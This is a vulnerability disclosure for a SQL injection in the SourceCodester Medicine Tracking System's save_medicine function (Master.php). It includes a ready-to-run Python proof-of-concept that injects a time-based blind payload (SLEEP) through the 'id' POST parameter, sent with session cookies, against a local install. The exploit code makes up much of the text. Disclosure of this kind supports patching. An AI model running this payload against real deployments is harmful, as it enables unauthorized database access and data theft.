Medicine Tracking System-SQL injection

Discoverer :heishou

manufacturers：https://www.sourcecodester.com/
Download at: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip

Document overview
Affected files: Master.php (especially save_medicine function)
Call point: manage_medicine.php (triggered by Ajax request)
vulnerability details
Type: SQL Injection
Location: Save_medicine method in ‘Master.phMaster.php
Data entry point: Ajax POST request to/php-mts/classes/Master.php? f=save_medicine
Key parameters: id, name, description
Vulnerability Description: When processing Ajax requests, the save_medicine function directly uses the parameters received for SQL query construction without parameterizing the query, resulting in potential SQL injection risk.

Exploits:

Tectonic POC

import requests  
import time  
  
# 目标URL  
url = "http://localhost/php-mts/classes/Master.php?f=save_medicine"  
  
# 构造恶意的POST数据  
data = {  
    'id': "' OR (SELECT 6647 FROM (SELECT(SLEEP(5)))VRGb)-- isuM",  
    'name': 'qazxc',  
    'description': 'adqmcooper'  
}  
  
# 包含提供的Cookie数据  
cookies = {  
    'USER_NAME_COOKIE': 'admin',  
    'SID_1': 'aa141d36',  
    'mailpoet_page_view': '%7B%22timestamp%22%3A1694409700%7D',  
    'mailpoet_subscriber': '%7B%22subscriber_id%22%3A2%7D',  
    '_ga': 'GA1.1.324136046.1702458922',  
    'Hm_lvt_6a3c7d9bb52a48ffadde32007d2a259e': '1702459185',  
    '_pk_id.1.1fff': '4343a030b8a53617.1702459185.',  
    'PHPSESSID': 'rnl5etfht6ltq81aoghoshm8rt'  
}  
  
# 记录发送请求前的时间  
start_time = time.time()  
  
# 发送请求  
response = requests.post(url, data=data, cookies=cookies)  
  
# 记录发送请求后的时间  
end_time = time.time()  
  
# 输出响应时间  
print(f"Response Time: {end_time - start_time} seconds")  
  
# 如果响应时间显著长于5秒，则可能存在SQL注入漏洞